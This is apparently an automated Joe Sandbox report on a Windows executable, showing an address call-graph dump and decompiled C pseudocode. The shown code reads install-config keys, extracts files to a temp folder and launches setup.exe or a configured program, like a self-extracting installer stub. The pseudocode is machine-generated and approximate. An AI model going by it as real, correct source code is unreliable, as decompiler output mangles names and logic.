15052->15104 15053->14987 15058 40df7a 15057->15058 15062 4065b2 3 API calls 15058->15062 15059 40df8e 15060 40df9e 15059->15060 15111 40dd8b 15059->15111 15060->14987 15062->15059 15064 40d1b5 __EH_prolog 15063->15064 15065 40df69 34 API calls 15064->15065 15066 40d208 15065->15066 15067 40d20e 15066->15067 15068 40d22f 15066->15068 15145 40d2cf 15067->15145 15141 40f8c3 15068->15141 15072 40d261 15151 40f4d8 15072->15151 15073 40d242 15074 40d2cf 34 API calls 15073->15074 15082 40d21a 15074->15082 15082->14987 15084 4088d9 15083->15084 15086 4088f6 15083->15086 15085 403b4f ctype 5 API calls 15084->15085 15084->15086 15085->15084 15086->14980 15088 4042ff 30 API calls 15087->15088 15089 40440f 15088->15089 15089->14980 15092 403a9c 29 API calls 15090->15092 15374 40ba4f 
15090->15374 15091 4042fc 15091->14987 15092->15091 15095 407d8c __EH_prolog 15094->15095 15408 407dd5 15095->15408 15098 40235e 30 API calls 15099 407db0 15098->15099 15100 401ce1 30 API calls 15099->15100 15101 407dbb 15100->15101 15102 403a9c ctype 29 API calls 15101->15102 15103 407dc3 15102->15103 15103->15013 15105 405b01 15104->15105 15106 405af7 GetLastError 15104->15106 15107 406534 15105->15107 15106->15105 15108 406538 15107->15108 15109 40653b GetLastError 15107->15109 15108->15053 15110 406545 15109->15110 15110->15053 15112 40dd95 __EH_prolog 15111->15112 15123 40776f 15112->15123 15114 40ddc1 15114->15060 15115 40ddae 15115->15114 15126 4076d5 15115->15126 15117 40decb 15118 403a9c ctype 29 API calls 15117->15118 15118->15114 15119 40dde7 ctype 15119->15117 15120 40ded0 15119->15120 15132 406505 15119->15132 15121 4065b2 3 API calls 15120->15121 15121->15117 15137 407723 15123->15137 15127 4076e2 15126->15127 15128 407716 15126->15128 15129 4076ed ctype 15127->15129 15130 403a76 30 API calls 15127->15130 15128->15119 15131 403a9c ctype 29 API calls 15129->15131 15130->15129 15131->15128 15133 405ba8 ReadFile 15132->15133 15134 40651d 15133->15134 15135 406534 GetLastError 15134->15135 15136 406530 15135->15136 15136->15119 15138 407737 15137->15138 15139 407766 15138->15139 15140 406505 ReadFile GetLastError 15138->15140 15139->15115 15140->15138 15142 40f8cd __EH_prolog 15141->15142 15177 40f648 15142->15177 15146 40d2d9 __EH_prolog 15145->15146 15147 4042d6 ctype 34 API calls 15146->15147 15148 40d2fd 15147->15148 15149 4042ad ctype 34 API calls 15148->15149 15150 40d308 15149->15150 15150->15082 15178 40f652 __EH_prolog 15177->15178 15217 40d377 15178->15217 15182 40f694 15183 40db47 RaiseException 15182->15183 15184 40f6c9 15182->15184 15183->15184 15191 40d23b 15184->15191 15216 4065b2 3 API calls 15184->15216 15185 40f720 15186 4076d5 30 API calls 15185->15186 15185->15191 15191->15072 15191->15073 15216->15185 15218 40d3d2 34 API calls 
15217->15218 15219 40d37f 15218->15219 15220 4042d6 ctype 34 API calls 15219->15220 15221 40d38a 15220->15221 15222 4042d6 ctype 34 API calls 15221->15222 15223 40d395 15222->15223 15224 4042d6 ctype 34 API calls 15223->15224 15225 40d3a0 15224->15225 15226 4042d6 ctype 34 API calls 15225->15226 15227 40d3ab 15226->15227 15228 4042d6 ctype 34 API calls 15227->15228 15229 40d3b6 15228->15229 15229->15182 15281 40db47 15229->15281 15282 413d3d RaiseException 15281->15282 15283 40db5f 15282->15283 15284 40db6f 15283->15284 15285 40db47 RaiseException 15283->15285 15284->15182 15285->15284 15376 40ba66 15374->15376 15375 40ba9e 15375->15091 15376->15375 15378 403a9c ctype 29 API calls 15376->15378 15379 40a011 15376->15379 15378->15376 15380 40a01b __EH_prolog 15379->15380 15381 4042ad ctype 34 API calls 15380->15381 15382 40a036 15381->15382 15383 4042ad ctype 34 API calls 15382->15383 15384 40a045 15383->15384 15385 4042d6 ctype 34 API calls 15384->15385 15386 40a05f 15385->15386 15387 4042ad ctype 34 API calls 15386->15387 15388 40a06a 15387->15388 15389 4042d6 ctype 34 API calls 15388->15389 15390 40a081 15389->15390 15391 4042ad ctype 34 API calls 15390->15391 15392 40a08c 15391->15392 15397 407868 15392->15397 15398 407880 15397->15398 15399 407887 15397->15399 15400 413260 SetEvent GetLastError 15398->15400 15401 407891 15399->15401 15402 407896 15399->15402 15400->15399 15403 413210 WaitForSingleObject 15401->15403 15404 4131e0 ctype CloseHandle GetLastError 15402->15404 15403->15402 15405 40789d 15404->15405 15406 4131e0 ctype CloseHandle GetLastError 15405->15406 15407 4078a5 15406->15407 15409 407ddf __EH_prolog 15408->15409 15411 401e19 30 API calls 15409->15411 15415 407e63 15409->15415 15410 407eb5 15412 407ebe 15410->15412 15413 407ecf 15410->15413 15417 407e1b 15411->15417 15433 407cd4 15412->15433 15416 402634 30 API calls 15413->15416 15415->15410 15419 407e8e 15415->15419 15432 407da4 15416->15432 15418 403b4f ctype 5 API calls 15417->15418 15420 
407e28 15418->15420 15421 401e3a 30 API calls 15419->15421 15422 403a9c ctype 29 API calls 15420->15422 15423 407e9a 15421->15423 15424 407e39 15422->15424 15425 402634 30 API calls 15423->15425 15424->15415 15426 407e3e 15424->15426 15427 407e5e 15425->15427 15428 401e3a 30 API calls 15426->15428 15430 403a9c ctype 29 API calls 15427->15430 15429 407e4a 15428->15429 15431 402634 30 API calls 15429->15431 15430->15432 15431->15427 15432->15098 15434 407cde __EH_prolog 15433->15434 15435 401ce1 30 API calls 15434->15435 15436 407cf1 15435->15436 15437 407d25 30 API calls 15436->15437 15438 407d00 15437->15438 15439 401ce1 30 API calls 15438->15439 15440 407d0b 15439->15440 15441 403a9c ctype 29 API calls 15440->15441 15442 407d13 15441->15442 15442->15432 15444 402170 30 API calls 15443->15444 15445 405925 15444->15445 15445->14879 15447 4049ab 15446->15447 15448 4049cd CreateDirectoryW 15446->15448 15449 4048ff 32 API calls 15447->15449 15448->14621 15450 4049b6 15449->15450 15455 40498d CreateDirectoryA 15450->15455 15452 4049bd 15453 403a9c ctype 29 API calls 15452->15453 15454 4049c7 15453->15454 15454->14621 15455->15452 15577 40c318 __EH_prolog 15576->15577 15583 40c290 15582->15583 15585 40c296 15582->15585 15583->14671 15585->15583 16071 413d3d RaiseException 15585->16071 15587 4042ff 30 API calls 15586->15587 15588 40c41b 15587->15588 15588->14671 16071->15583 16073 409500 __EH_prolog 16072->16073 16074 401ce1 30 API calls 16073->16074 16075 409513 16074->16075 16076 401c80 30 API calls 16075->16076 16077 409524 16076->16077 16078 401e56 30 API calls 16077->16078 16079 409537 16078->16079 16080 403a9c ctype 29 API calls 16079->16080 16081 409543 16080->16081 16082 401ce1 30 API calls 16081->16082 16087 403426 __EH_prolog 16086->16087 16088 4042d6 ctype 34 API calls 16087->16088 16089 403452 16088->16089 16090 4042ad ctype 34 API calls 16089->16090 16091 40345d 16090->16091 16092 4042d6 ctype 34 API calls 16091->16092 16093 403471 16092->16093 16094 4042ad 

                              Control-flow Graph

                              C-Code - Quality: 83%
                              			_entry_(void* __ebx, void* __edi, void* __esi) {
                              				CHAR* _v8;
                              				intOrPtr* _v24;
                              				intOrPtr _v28;
                              				struct _STARTUPINFOA _v96;
                              				intOrPtr _v100;
                              				intOrPtr _v104;
                              				intOrPtr _v108;
                              				unsigned int _t15;
                              				signed int _t27;
                              				intOrPtr _t29;
                              				signed int _t35;
                              				intOrPtr _t52;
                              
                              				_t47 = __edi;
                              				_push(0xffffffff);
                              				_push(0x41b9e0);
                              				_push(E00414A2C);
                              				_push( *[fs:0x0]);
                              				 *[fs:0x0] = _t52;
                              				_push(__edi);
                              				_v28 = _t52 - 0x58;
                              				_t15 = GetVersion();
                              				 *0x4233d0 = 0;
                              				_t35 = _t15 & 0x000000ff;
                              				 *0x4233cc = _t35;
                              				 *0x4233c8 = _t35 << 8;
                              				 *0x4233c4 = _t15 >> 0x10;
                              				if(E004159F8(_t35 << 8, 1) == 0) {
                              					E00414C31(0x1c);
                              				}
                              				if(E004154BC() == 0) {
                              					E00414C31(0x10);
                              				}
                              				_v8 = 0;
                              				E00417641();
                              				 *0x425a3c = GetCommandLineA();
                              				 *0x423340 = E0041750F();
                              				E004172C2();
                              				E00417209();
                              				E00416C69();
                              				_v96.dwFlags = 0;
                              				GetStartupInfoA( &_v96);
                              				_v104 = E004171B1();
                              				_t56 = _v96.dwFlags & 0x00000001;
                              				if((_v96.dwFlags & 0x00000001) == 0) {
                              					_t27 = 0xa;
                              				} else {
                              					_t27 = _v96.wShowWindow & 0x0000ffff;
                              				}
                              				_t29 = E00401014(_t56, GetModuleHandleA(0), 0, _v104, _t27); // executed
                              				_v100 = _t29;
                              				E00416C96(_t29);
                              				_v108 =  *((intOrPtr*)( *_v24));
                              				return E00417039(_t47, _t56,  *((intOrPtr*)( *_v24)), _v24);
                              			}
















                              APIs
                              • GetVersion.KERNEL32 ref: 00414B2A
                                • Part of subcall function 004159F8: HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                • Part of subcall function 004159F8: HeapDestroy.KERNEL32 ref: 00415A48
                              • GetCommandLineA.KERNEL32 ref: 00414B8A
                              • GetStartupInfoA.KERNEL32(?), ref: 00414BB5
                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00414BD8
                                • Part of subcall function 00414C31: ExitProcess.KERNEL32 ref: 00414C4E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                              • String ID: 03f
                              • API String ID: 2057626494-2341510623
                              • Opcode ID: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                              • Instruction ID: b13fe99396feb2249fb7197ea22bdd2eb3a8d4431b5d50e9622b99800ed9eeb5
                              • Opcode Fuzzy Hash: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                              • Instruction Fuzzy Hash: 0721D2B0A44705AFD718AFB6DC46BEE7BB8EF44714F10052FF9009A291DB3C85808A9C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 77%
                              			E004055DE(void** __ecx, void* __eflags) {
                              				signed int _t23;
                              				signed int _t25;
                              				void* _t36;
                              				void** _t51;
                              				void* _t53;
                              
                              				E00413954(E004196AC, _t53);
                              				_t51 = __ecx;
                              				_t23 = E0040551A(__ecx);
                              				if(_t23 != 0) {
                              					if( *0x423148 == 0) {
                              						E00401C80(_t53 - 0x18,  *(_t53 + 8));
                              						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
                              						_t25 = AreFileApisANSI();
                              						asm("sbb eax, eax");
                              						_push( ~_t25 + 1);
                              						 *_t51 = FindFirstFileA( *(E00403D04(_t53 - 0x24)), _t53 - 0x164);
                              						E00403A9C( *((intOrPtr*)(_t53 - 0x24)));
                              						 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
                              						E00403A9C( *((intOrPtr*)(_t53 - 0x18)));
                              						__eflags =  *_t51 - 0xffffffff;
                              						if(__eflags != 0) {
                              							E00405705(_t53 - 0x164,  *((intOrPtr*)(_t53 + 0xc)), __eflags);
                              						}
                              					} else {
                              						_t36 = FindFirstFileW( *(_t53 + 8), _t53 - 0x3b4); // executed
                              						_t61 = _t36 - 0xffffffff;
                              						 *_t51 = _t36;
                              						if(_t36 != 0xffffffff) {
                              							E004056A6(_t53 - 0x3b4,  *((intOrPtr*)(_t53 + 0xc)), _t61);
                              						}
                              					}
                              					_t23 = 0 |  *_t51 != 0xffffffff;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
                              				return _t23;
                              			}









                              APIs
                              • __EH_prolog.LIBCMT ref: 004055E3
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              • FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                              • AreFileApisANSI.KERNEL32(?), ref: 0040563D
                              • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040565E
                              Similarity
                              • API ID: FileFind$First$ApisCloseH_prolog
                              • String ID:
                              • API String ID: 4121580741-0
                              • Opcode ID: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                              • Instruction ID: 53571c6d670a3437f98eaf3b47711b77fa147e423a783867877babb07b55427d
                              • Opcode Fuzzy Hash: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                              • Instruction Fuzzy Hash: AB21813180050ADFCF11EF60C8459EEBB75EF00329F10476AE4A5B61E1DB399A85CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040553A(void** __ecx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
                              				struct _WIN32_FIND_DATAA _v324;
                              				void* _t8;
                              				void** _t14;
                              
                              				_t14 = __ecx;
                              				if(E0040551A(__ecx) == 0) {
                              					L2:
                              					return 0;
                              				}
                              				_t8 = FindFirstFileA(_a4,  &_v324); // executed
                              				 *_t14 = _t8;
                              				if(_t8 != 0xffffffff) {
                              					E0040557F( &_v324, _a8, __eflags);
                              					return 1;
                              				}
                              				goto L2;
                              			}







                              APIs
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              • FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                              • Instruction ID: 4d0f5172a85985fc9641596f45f8b0e99eb03685ed3a07152804d04183bf4296
                              • Opcode Fuzzy Hash: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                              • Instruction Fuzzy Hash: 5DE0923040050876CB20BF35DC019EB776AEF11398F104276F955672E5D738D9468F98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0041584A() {
                              				_Unknown_base(*)()* _t1;
                              
                              				_t1 = SetUnhandledExceptionFilter(E00415804); // executed
                              				 *0x4233b0 = _t1;
                              				return _t1;
                              			}





                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00015804), ref: 0041584F
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                              • Instruction ID: 76677b13eed7a87b3dd700732a0fedcf1c6828d453a24416ba8446ce1f8cc847
                              • Opcode Fuzzy Hash: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                              • Instruction Fuzzy Hash: 6CA022F0280300CF8B00AF20AC082C03E30F28830330000B3B80080238CF380388CA2C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE ref: 00415861
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                              • Instruction ID: 9f5714f3741d262582d91aa49c58cb07bd20065c27159592644951a243d3f8b5
                              • Opcode Fuzzy Hash: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 90%
                              			E00401014(void* __eflags, void* _a4, signed int _a7) {
                              				signed int _v5;
                              				char _v20;
                              				struct HWND__* _v24;
                              				struct HWND__* _v28;
                              				char _v32;
                              				struct HWND__* _v36;
                              				signed int _v40;
                              				signed int _v44;
                              				struct HWND__* _v48;
                              				struct HWND__* _v52;
                              				char _v56;
                              				WCHAR* _v68;
                              				struct HWND__* _v72;
                              				struct HWND__* _v76;
                              				char _v80;
                              				struct HWND__* _v84;
                              				struct HWND__* _v88;
                              				char _v92;
                              				struct HWND__* _v96;
                              				struct HWND__* _v100;
                              				char _v104;
                              				struct HWND__* _v108;
                              				struct HWND__* _v112;
                              				char _v116;
                              				CHAR* _v128;
                              				CHAR* _v140;
                              				char _v144;
                              				struct HWND__* _v148;
                              				struct HWND__* _v152;
                              				char _v156;
                              				intOrPtr _v164;
                              				char _v176;
                              				char _v188;
                              				char _v200;
                              				char _v212;
                              				char _v216;
                              				CHAR* _v228;
                              				struct _PROCESS_INFORMATION _v244;
                              				struct _STARTUPINFOA _v312;
                              				void* __ebp;
                              				char _t280;
                              				intOrPtr* _t294;
                              				void* _t297;
                              				void* _t302;
                              				signed int _t306;
                              				signed int _t308;
                              				signed int _t314;
                              				signed int _t318;
                              				signed int _t339;
                              				void* _t375;
                              				signed char _t384;
                              				signed int _t423;
                              				signed int _t436;
                              				int _t466;
                              				intOrPtr _t501;
                              				void* _t619;
                              				void* _t620;
                              				void* _t635;
                              				signed int _t636;
                              				signed int _t640;
                              				signed int _t642;
                              				void* _t643;
                              				char** _t644;
                              
                              				 *0x423144 = _a4;
                              				_t280 = E00401A51();
                              				_t635 = 3;
                              				 *0x423148 = _t280;
                              				_v156 = 0;
                              				_v152 = 0;
                              				_v148 = 0;
                              				E00402170( &_v156, _t635);
                              				_v32 = 0;
                              				_v28 = 0;
                              				_v24 = 0;
                              				E00402170( &_v32, _t635);
                              				_v80 = 0;
                              				_v76 = 0;
                              				_v72 = 0;
                              				E00402170( &_v80, _t635);
                              				_v116 = 0;
                              				_v112 = 0;
                              				_v108 = 0;
                              				E00402170( &_v116, _t635);
                              				E00401C80( &_v68, GetCommandLineW());
                              				_push( &_v32);
                              				E004038EE( &_v68,  &_v156);
                              				E00403A9C(_v68);
                              				_v104 = 0;
                              				_v100 = 0;
                              				_v96 = 0;
                              				E00402170( &_v104, _t635);
                              				_t501 =  *0x423144; // 0x400000
                              				E004045E2(_t501,  &_v104);
                              				E0040235E( &_v32);
                              				E00402323( &_v32);
                              				_a7 = 0;
                              				_t294 = E00401C80( &_v68, L"-y");
                              				E00401E3A( &_v32,  &_v20, 2);
                              				_t297 = E00403B4F( *_t294);
                              				E00403A9C(_v20);
                              				E00403A9C(_v68);
                              				_t649 = _t297;
                              				if(_t297 == 0) {
                              					_a7 = 1;
                              					E00401D7A( &_v32, E00401E19( &_v32,  &_v20, 2));
                              					E00403A9C(_v20);
                              					E0040235E( &_v32);
                              					E00402323( &_v32);
                              				}
                              				_v92 = 0;
                              				_v88 = 0;
                              				_v84 = 0;
                              				E0040243E( &_v92, _t635);
                              				_push( &_v92);
                              				_push(";!@InstallEnd@!");
                              				_t302 = E00401AF4(_v104, ";!@Install@!UTF-8!", _t649); // executed
                              				if(_t302 != 0) {
                              					E00401C80( &_v212, L".\\");
                              					_v56 = 0;
                              					_v52 = 0;
                              					_v48 = 0;
                              					E00402170( &_v56, _t635);
                              					__eflags = _v88;
                              					_v216 = 1;
                              					if(_v88 == 0) {
                              						L21:
                              						_v144 = 0;
                              						E00401ECD( &_v140);
                              						_t306 = E00405298( &_v144, _t643,  *0x420060);
                              						__eflags = _t306;
                              						if(_t306 != 0) {
                              							_push(0x1c);
                              							_t640 = E00403A76();
                              							__eflags = _t640;
                              							if(_t640 == 0) {
                              								_t636 = 0;
                              								__eflags = 0;
                              							} else {
                              								_t139 = _t640 + 8; // 0x8
                              								 *((intOrPtr*)(_t640 + 4)) = 0;
                              								E00401F0D(_t139);
                              								 *_t640 = 0x41b328;
                              								_t636 = _t640;
                              							}
                              							__eflags = _t636;
                              							if(_t636 != 0) {
                              								 *((intOrPtr*)( *_t636 + 4))(_t636);
                              							}
                              							_t308 = E00408107(_t636);
                              							__eflags = _t308;
                              							if(_t308 == 0) {
                              								E00401A03();
                              								_v5 = 0;
                              								_v44 = 0;
                              								_v40 = 0;
                              								_v36 = 0;
                              								E00402170( &_v44, 3);
                              								_push( &_v44);
                              								_push( &_v5);
                              								_push(_v216);
                              								_push( &_v200); // executed
                              								_t314 = E00402F15(_t636,  &_v104, __eflags); // executed
                              								__eflags = _t314;
                              								if(_t314 == 0) {
                              									E00403A9C(_v44);
                              									E00401ECD( &_v128);
                              									E00405033( &_v128);
                              									_t318 = SetCurrentDirectoryA(_v140); // executed
                              									__eflags = _t318;
                              									if(_t318 != 0) {
                              										__eflags = _v76;
                              										if(_v76 == 0) {
                              											__eflags = _v52;
                              											if(_v52 != 0) {
                              												L57:
                              												E00401CE1( &_v68,  &_v200);
                              												E00405D0B( &_v68);
                              												E00401C80( &_v20, L"%%T\\");
                              												E00401E56( &_v56,  &_v20,  &_v68);
                              												E00403A9C(_v20);
                              												E00403A9C(_v68);
                              												E00401C80( &_v20, L"%%T");
                              												E00401E56( &_v56,  &_v20,  &_v200);
                              												E00403A9C(_v20);
                              												__eflags = _v28;
                              												if(_v28 != 0) {
                              													E00401DB8( &_v56, 0x20);
                              													E00401DE3( &_v56,  &_v32);
                              												}
                              												_push( &_v56);
                              												_v312.cb = 0x44;
                              												_v312.lpReserved = 0;
                              												_v312.lpDesktop.cbSize = 0;
                              												_v312.lpTitle = 0;
                              												_v312.dwFlags = 0;
                              												_v312.cbReserved2 = 0;
                              												_v312.lpReserved2 = 0;
                              												E00402634( &_v188,  &_v212);
                              												E00401A18();
                              												E00403A9C(_v188);
                              												_t339 = CreateProcessA(0, _v228, 0, 0, 0, 0, 0, 0,  &_v312,  &_v244); // executed
                              												__eflags = _t339;
                              												if(_t339 != 0) {
                              													CloseHandle(_v244.hThread);
                              													_a4 = _v244.hProcess;
                              													E00403A9C(_v228);
                              													L69:
                              													__eflags = _a4;
                              													if(_a4 != 0) {
                              														WaitForSingleObject(_a4, 0xffffffff);
                              														CloseHandle(_a4);
                              													}
                              													SetCurrentDirectoryA(_v128); // executed
                              													E00403A9C(_v128);
                              													E00403A9C(_v200);
                              													__eflags = _t636;
                              													if(_t636 != 0) {
                              														 *((intOrPtr*)( *_t636 + 8))(_t636);
                              													}
                              													goto L73;
                              												} else {
                              													__eflags = _a7;
                              													if(_a7 == 0) {
                              														__eflags = 0;
                              														E00411127(0);
                              													}
                              													E00403A9C(_v228);
                              													L63:
                              													L64:
                              													SetCurrentDirectoryA(_v128);
                              													_push(_v128);
                              													L65:
                              													E00403A9C();
                              													E00403A9C(_v200);
                              													__eflags = _t636;
                              													if(_t636 != 0) {
                              														 *((intOrPtr*)( *_t636 + 8))(_t636);
                              													}
                              													E00401A2D( &_v144);
                              													E00403A9C(_v140);
                              													E00403A9C(_v56);
                              													E00403A9C(_v212);
                              													E00403A9C(_v92);
                              													E00403A9C(_v104);
                              													E00403A9C(_v116);
                              													E00403A9C(_v80);
                              													E00403A9C(_v32);
                              													E00403A9C(_v156);
                              													_t375 = 1;
                              													return _t375;
                              												}
                              											}
                              											E00401D1B( &_v56, L"setup.exe");
                              											_t384 = E0040587C( *((intOrPtr*)(E00401A18())),  &_v56, __eflags);
                              											asm("sbb al, al");
                              											_v5 =  ~_t384 + 1;
                              											E00403A9C(_v188);
                              											__eflags = _v5;
                              											if(_v5 == 0) {
                              												goto L57;
                              											}
                              											__eflags = _a7;
                              											if(_a7 == 0) {
                              												E00411093(0, L"Can not find setup.exe");
                              											}
                              											goto L64;
                              										}
                              										E00401A18();
                              										__eflags = _v28;
                              										_v312.lpDesktop.cbSize = 0x3c;
                              										_v312.lpTitle = 0x140;
                              										_v312.dwX = 0;
                              										_v312.dwY = 0;
                              										_v312.dwXSize = _v68;
                              										if(_v28 != 0) {
                              											E00401DE3( &_v116,  &_v32);
                              										}
                              										E00401A18();
                              										_v312.dwXCountChars = 0;
                              										asm("sbb eax, eax");
                              										_v312.dwYCountChars = 1;
                              										_v312.hStdError = 0;
                              										_v312.dwYSize =  ~_v40 & _v44;
                              										ShellExecuteExA( &(_v312.lpDesktop));
                              										__eflags = _v312.dwFillAttribute - 0x20;
                              										if(_v312.dwFillAttribute > 0x20) {
                              											_a4 = _v312.hStdError;
                              											E00403A9C(_v44);
                              											E00403A9C(_v68);
                              											goto L69;
                              										} else {
                              											__eflags = _a7;
                              											if(_a7 == 0) {
                              												__eflags = 0;
                              												E00411093(0, L"Can not open file");
                              											}
                              											E00403A9C(_v44);
                              											E00403A9C(_v68);
                              											goto L63;
                              										}
                              									}
                              									SetCurrentDirectoryA(_v128);
                              									E00403A9C(_v128);
                              									E00403A9C(_v200);
                              									goto L43;
                              								}
                              								__eflags = _a7;
                              								if(_a7 != 0) {
                              									L40:
                              									_push(_v44);
                              									goto L65;
                              								}
                              								__eflags = _t314 - 1;
                              								if(_t314 == 1) {
                              									L36:
                              									_t619 = 8;
                              									E00401D7A( &_v44, E0040602F(_t619));
                              									E00403A9C(_v188);
                              									_t314 = 0x80004005;
                              									L37:
                              									__eflags = _t314 - 0x80004004;
                              									if(_t314 != 0x80004004) {
                              										__eflags = _v40;
                              										if(_v40 != 0) {
                              											_t620 = 7;
                              											MessageBoxW(0, _v44,  *(E0040602F(_t620)), 0x10);
                              											E00403A9C(_v188);
                              										}
                              									}
                              									goto L40;
                              								}
                              								__eflags = _v5;
                              								if(_v5 == 0) {
                              									goto L37;
                              								}
                              								goto L36;
                              							} else {
                              								E00411093(0, L"Can not load codecs");
                              								L43:
                              								__eflags = _t636;
                              								if(_t636 != 0) {
                              									 *((intOrPtr*)( *_t636 + 8))(_t636);
                              								}
                              								L24:
                              								_push(1);
                              								_pop(0);
                              								L73:
                              								E00401A2D( &_v144);
                              								E00403A9C(_v140);
                              								E00403A9C(_v56);
                              								E00403A9C(_v212);
                              								_t644 =  &(_t644[3]);
                              								goto L74;
                              							}
                              						}
                              						__eflags = _a7;
                              						if(_a7 == 0) {
                              							__eflags = 0;
                              							E00411093(0, L"Can not create temp folder archive");
                              						}
                              						goto L24;
                              					}
                              					E00402155( &_v176);
                              					_v176 = 0x41b334;
                              					_t423 = E00403D5A( &_v92,  &_v176);
                              					__eflags = _t423;
                              					if(_t423 != 0) {
                              						E00401C80( &_v20, L"Title");
                              						E00404073( &_v68,  &_v176,  &_v20);
                              						E00403A9C(_v20);
                              						 *_t644 = L"BeginPrompt";
                              						E00401C80( &_v20);
                              						E00404073( &_v44,  &_v176,  &_v20);
                              						E00403A9C(_v20);
                              						 *_t644 = L"Progress";
                              						E00401C80( &_v20);
                              						E00404073( &_v228,  &_v176,  &_v20);
                              						E00403A9C(_v20);
                              						_t436 = E00403B4F(L"no");
                              						__eflags = _t436;
                              						if(_t436 == 0) {
                              							_v216 = 0;
                              						}
                              						E00401C80( &_v20, L"Directory");
                              						_t642 = E00404041( &_v176,  &_v20);
                              						E00403A9C(_v20);
                              						__eflags = _t642;
                              						if(_t642 >= 0) {
                              							__eflags =  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc;
                              							E00401D7A( &_v212,  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc);
                              						}
                              						__eflags = _v40;
                              						if(_v40 == 0) {
                              							L20:
                              							E00401C80( &_v20, L"RunProgram");
                              							E00401D7A( &_v56, E00404073( &(_v244.hThread),  &_v176,  &_v20));
                              							E00403A9C(_v244.hThread);
                              							E00403A9C(_v20);
                              							E00401C80( &_v20, L"ExecuteFile");
                              							E00401D7A( &_v80, E00404073( &(_v244.hThread),  &_v176,  &_v20));
                              							E00403A9C(_v244.hThread);
                              							E00403A9C(_v20);
                              							E00401C80( &_v20, L"ExecuteParameters");
                              							_push( &_v32);
                              							E00401D7A( &_v116, E00402634( &(_v244.hThread), E00404073( &_v188,  &_v176,  &_v20)));
                              							E00403A9C(_v244.hThread);
                              							E00403A9C(_v188);
                              							E00403A9C(_v20);
                              							E00403A9C(_v228);
                              							E00403A9C(_v44);
                              							E00403A9C(_v68);
                              							_t644 =  &(_t644[6]);
                              							_v176 = 0x41b334;
                              							E004042D6();
                              							E004042AD( &_v176);
                              							goto L21;
                              						} else {
                              							__eflags = _a7;
                              							if(_a7 != 0) {
                              								goto L20;
                              							}
                              							_t466 = MessageBoxW(0, _v44, _v68, 0x24);
                              							__eflags = _t466 - 6;
                              							if(_t466 == 6) {
                              								goto L20;
                              							}
                              							E00403A9C(_v228);
                              							E00403A9C(_v44);
                              							E00403A9C(_v68);
                              							_t644 =  &(_t644[3]);
                              							L19:
                              							_v176 = 0x41b334;
                              							E004042D6();
                              							E004042AD( &_v176);
                              							E00403A9C(_v56);
                              							E00403A9C(_v212);
                              							E00403A9C(_v92);
                              							E00403A9C(_v104);
                              							E00403A9C(_v116);
                              							E00403A9C(_v80);
                              							E00403A9C(_v32);
                              							E00403A9C(_v156);
                              							goto L75;
                              						}
                              					}
                              					__eflags = _a7;
                              					if(_a7 == 0) {
                              						__eflags = 0;
                              						E00411093(0, L"Config failed");
                              					}
                              					_push(1);
                              					_pop(0);
                              					goto L19;
                              				} else {
                              					if(_a7 == 0) {
                              						E00411093(0, L"Can\'t load config info");
                              					}
                              					_push(1);
                              					_pop(0);
                              					L74:
                              					E00403A9C(_v92);
                              					E00403A9C(_v104);
